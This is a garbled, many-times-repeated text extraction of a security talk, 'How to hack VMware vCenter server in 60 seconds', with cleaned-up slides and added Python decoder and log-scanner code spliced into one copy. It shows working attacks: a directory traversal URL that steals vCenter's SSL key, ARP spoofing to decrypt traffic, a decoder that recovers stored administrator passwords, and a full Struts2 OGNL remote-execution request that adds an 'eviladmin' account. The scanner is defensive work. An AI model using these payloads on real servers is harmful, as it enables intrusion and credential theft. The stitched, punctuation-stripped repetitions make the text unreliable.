(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
VASTO
bull ldquoVASTO ndash collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutionsrdquo httpvastonibblesecorg
bull vmware_updatemanager_traversalrb Jetty path traversal bull vmware_session_riderrb
Local proxy to ride stolen SOAPID sessions
bull Fixed in version 41 update 1 bull contain ip - addresses
Attack
bull Make arp spoofing bull Spoof ssl certificate
Attack
bull Administrators check SSL cert
Attack
bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll
UsersApplication DataVMwareVMware VirtualCenterSSLruikey
bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work
Vmware vCenter Orchestrator
bull Vmware vCO ndash software for automate configuration and management
bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties
bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables
GPU
We get in
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
bull Fixed in version 41 update 1 bull contain ip - addresses
Attack
bull Make arp spoofing bull Spoof ssl certificate
Attack
bull Administrators check SSL cert
Attack
bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll
UsersApplication DataVMwareVMware VirtualCenterSSLruikey
bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work
Vmware vCenter Orchestrator
bull Vmware vCO ndash software for automate configuration and management
bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties
bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables
GPU
We get in
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
Attack
bull Make arp spoofing bull Spoof ssl certificate
Attack
bull Administrators check SSL cert
Attack
bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll
UsersApplication DataVMwareVMware VirtualCenterSSLruikey
bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work
Vmware vCenter Orchestrator
bull Vmware vCO ndash software for automate configuration and management
bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties
bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables
GPU
We get in
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VC.xml
    <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
    <virtual-infrastructure-hosts>
      <virtual-infrastructure-host>
        <enabled>true</enabled>
        <url>https://new-virtual-center-host:443/sdk</url>
        <administrator-username>vmware</administrator-username>
        <administrator-password>010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef</administrator-password>
        <pattern>%u</pattern>
      </virtual-infrastructure-host>
    </virtual-infrastructure-hosts>
Password Encoding
    006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b  →  vmware
    00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079  →  vcenter
• Red bytes look like the length (the slide's colours are lost here: the leading three digits are the length)
• Green bytes are in the ASCII range (the pairs that follow the length)
• Black bytes are random (the padding at the end)
Algorithm: password Encoding
    for (int i = 0; i < nbDigits; i++) {
        int value = 0;
        if (i < pwd.length()) {
            value = pwd.charAt(i);                    // take i-th password symbol
        } else {
            value = Math.abs(rnd.nextInt() % 100);    // take random byte
        }
        String toAdd = Integer.toHexString(value + i); // i-th password symbol + position of symbol
        result.append(toAdd);
    }
Password Decoder
    len = pass[0..2].to_i                 # first three digits: decimal length of the password
    enc_pass = pass[3..-1].scan(/../)     # the rest as two-digit hex bytes
    dec_pass = (0...len).collect do |i|   # only the first len bytes carry password symbols
      byte = enc_pass[i].to_i(16)
      byte -= i                           # undo the "+ position" of the encoder
      byte.chr
    end
    dec_pass = dec_pass.join
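The encoding and decoding described on the last three slides, re-implemented as an added example (not code from the talk or from VMware). The encoder mirrors the Java loop above, the three-digit decimal length prefix follows the Ruby decoder, and the VC.xml snippet is the one from the slide; the "nbDigits" value of 32 and the audit helper are this example's assumptions. The point for a defender is that the whole thing reverses with no key, so anyone who can read VC.xml holds the vCenter administrator credential in cleartext.

```python
"""vCO password "encoding": a position-shift obfuscation, not encryption."""
import random
import xml.etree.ElementTree as ET
from typing import Optional

ENC_DIGITS = 32  # byte positions emitted per password; inferred from the slide samples


def encode_vco_password(pwd: str, rng: Optional[random.Random] = None) -> str:
    """Obfuscate pwd as the Java loop on the slide does:
    3-digit decimal length, then hex(char + position), then random padding."""
    rng = rng or random.Random()
    out = [f"{len(pwd):03d}"]  # e.g. "006" for "vmware"
    for i in range(ENC_DIGITS):
        if i < len(pwd):
            value = ord(pwd[i])            # take i-th password symbol
        else:
            value = rng.randrange(100)     # Math.abs(rnd.nextInt() % 100) in the Java
        out.append(format(value + i, "x"))  # symbol + position, as Integer.toHexString
    return "".join(out)


def decode_vco_password(enc: str) -> str:
    """Reverse the encoding: read the length, subtract each byte's position."""
    if len(enc) < 3 or not enc[:3].isdigit():
        raise ValueError("missing 3-digit length prefix")
    n = int(enc[:3], 10)
    body = enc[3:]
    if len(body) < 2 * n:
        raise ValueError("encoded string shorter than the declared length")
    return "".join(chr(int(body[2 * i:2 * i + 2], 16) - i) for i in range(n))


# Samples printed on the "Password Encoding" slide.
SLIDE_SAMPLES = {
    "006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b": "vmware",
    "00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079": "vcenter",
}

# VC.xml as shown on the slide (reconstructed; the password value is the slide's).
VC_XML_SAMPLE = b"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<virtual-infrastructure-hosts>
  <virtual-infrastructure-host>
    <enabled>true</enabled>
    <url>https://new-virtual-center-host:443/sdk</url>
    <administrator-username>vmware</administrator-username>
    <administrator-password>010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef</administrator-password>
    <pattern>%u</pattern>
  </virtual-infrastructure-host>
</virtual-infrastructure-hosts>
"""


def audit_vc_xml(xml_bytes: bytes) -> list:
    """What a reader of VC.xml recovers for each configured vCenter host:
    URL, administrator username and the cleartext administrator password."""
    root = ET.fromstring(xml_bytes)
    findings = []
    for host in root.iter("virtual-infrastructure-host"):
        enc = host.findtext("administrator-password", default="")
        findings.append({
            "url": host.findtext("url", default=""),
            "username": host.findtext("administrator-username", default=""),
            "password": decode_vco_password(enc) if enc else "",
        })
    return findings


def round_trip_ok(pwd: str) -> bool:
    """Encoding then decoding must give the original back (padding is irrelevant)."""
    return decode_vco_password(encode_vco_password(pwd, random.Random(1))) == pwd


if __name__ == "__main__":
    for enc, expected in SLIDE_SAMPLES.items():
        print(enc[:14] + "...", "->", decode_vco_password(enc), "(slide:", expected + ")")
    for finding in audit_vc_xml(VC_XML_SAMPLE):
        print(finding)
```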
VMSA-2011-0005
• VMware vCenter Orchestrator uses Struts2 version 2.1.1 (discovered by Digital Defense Inc.)
• CVE-2010-1870: Struts2/XWork remote command execution (discovered by Meder Kydyraliev)
• Fixed in 4.2
CVE-2010-1870
• OGNL – expression language for Java
• Struts2 treats each HTTP parameter name as an OGNL statement:
    http://target/login.action?page['login']=user  →  action.getPage().setLanguage("user")
CVE-2010-1870
• OGNL supports:
  • Method calling: foo()
  • Static method calling: @java.lang.System@exit(1)
  • Constructor calling: new MyClass()
  • Referring to variables: #foo = new MyClass()
  • Context variables: #application, #session, #context
CVE-2010-1870
• Struts2 does not properly escape "#"
• Could be bypassed with the unicode escape "\u0023"
• Two variables need to be set for RCE:
  • #_memberAccess['allowStaticMethodAccess']
  • #context['xwork.MethodAccessor.denyMethodExecution']
CVE-2010-1870
• Example exploit:
  • #_memberAccess['allowStaticMethodAccess'] = true
  • #foo = new java.lang.Boolean("false")
  • #context['xwork.MethodAccessor.denyMethodExecution'] = #foo
  • #rt = @java.lang.Runtime@getRuntime()
  • #rt.exec('calc.exe')
CVE-2010-1870
• Example exploit: a single GET request to http://target:8282/login.action whose parameter names carry the statements above as OGNL expressions (each wrapped in parentheses so it is evaluated as a name, with "#" written as \u0023 and "=" as \u003d to pass the escaping), the last one being #rt.exec("net user add eviladmin passWD123")
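Detection logic for the request pattern the CVE-2010-1870 slides describe, as an added example that is not part of the talk: Struts2 evaluated parameter names, so the indicators live in the names, and the \u0023 / \u003d escapes from the bypass slide are themselves a strong signal. The access-log lines are constructed for this example in combined-log format; the indicator list and label names are this example's assumptions.

```python
"""Flag OGNL-in-parameter-name requests (the CVE-2010-1870 pattern) in web access logs."""
import re
from urllib.parse import unquote

# Indicators taken from the slides: the unicode escapes used to slip past the
# "#" escaping, the two variables that must be flipped for RCE, and the
# static-method / Runtime references of the example exploit.
OGNL_INDICATORS = [
    ("unicode_hash", re.compile(r"\\u0023", re.I)),
    ("unicode_equals", re.compile(r"\\u003d", re.I)),
    ("member_access", re.compile(r"_memberAccess", re.I)),
    ("allow_static", re.compile(r"allowStaticMethodAccess", re.I)),
    ("deny_method_exec", re.compile(r"denyMethodExecution", re.I)),
    ("static_call", re.compile(r"@java\.lang\.", re.I)),
    ("runtime", re.compile(r"getRuntime\s*\(", re.I)),
]

# Request line inside a combined-format access log entry.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def param_names(request_target: str) -> list:
    """Return the decoded parameter *names* of a request target (values are ignored)."""
    if "?" not in request_target:
        return []
    query = request_target.split("?", 1)[1]
    names = []
    for part in query.split("&"):
        name = part.split("=", 1)[0]
        # Decode twice: double percent-encoding is a common way to hide the escapes.
        names.append(unquote(unquote(name)))
    return names


def scan_request(request_target: str) -> list:
    """Sorted list of indicator labels matched in any parameter name (empty if clean)."""
    hits = set()
    for name in param_names(request_target):
        if not name.strip():
            continue
        for label, rx in OGNL_INDICATORS:
            if rx.search(name):
                hits.add(label)
        # A parameter name that is itself a parenthesised expression is not a form field.
        if name.startswith("(") and ")" in name:
            hits.add("expression_name")
    return sorted(hits)


def scan_log(lines) -> list:
    """(line_no, request_target, indicators) for every request whose names look like OGNL."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        hits = scan_request(m.group("path"))
        if hits:
            findings.append((no, m.group("path"), hits))
    return findings


# Constructed sample log. Lines 3 and 4 carry the first segment of the slide's
# payload, percent-encoded as a web server would log it; line 4 is double-encoded.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2011:10:00:01 +0000] "GET /login.action?page=1&lang=en HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2011:10:00:02 +0000] "POST /vmo/login.action HTTP/1.1" 302 0',
    '10.0.0.9 - - [01/Jan/2011:10:00:03 +0000] "GET /login.action?(%5Cu0023_memberAccess%5B%27allowStaticMethodAccess%27%5D)(meh)=true HTTP/1.1" 200 1024',
    '10.0.0.9 - - [01/Jan/2011:10:00:04 +0000] "GET /login.action?(%255Cu0023_memberAccess%255B%2527allowStaticMethodAccess%2527%255D)(x)=true HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for no, path, hits in scan_log(SAMPLE_LOG):
        print(f"line {no}: {', '.join(hits)}  <- {path}")
```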
Hardening
• Update to the latest version (4.2 update 4 or 5)
• Filter access to the administration service and other services
• VMware vSphere Security Hardening Guide
Conclusions
• Fixed bugs are not always fixed in the proper way
• One simple bug, and we can own the whole infrastructure
• Passwords must be stored as salted hashes, or encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
Attack
bull Administrators check SSL cert
Attack
bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll
UsersApplication DataVMwareVMware VirtualCenterSSLruikey
bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work
Vmware vCenter Orchestrator
bull Vmware vCO ndash software for automate configuration and management
bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties
bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables
GPU
We get in
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
Attack
bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll
UsersApplication DataVMwareVMware VirtualCenterSSLruikey
bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work
Vmware vCenter Orchestrator
bull Vmware vCO ndash software for automate configuration and management
bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties
bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables
GPU
We get in
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
Vmware vCenter Orchestrator
bull Vmware vCO ndash software for automate configuration and management
bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties
bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables
GPU
We get in
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
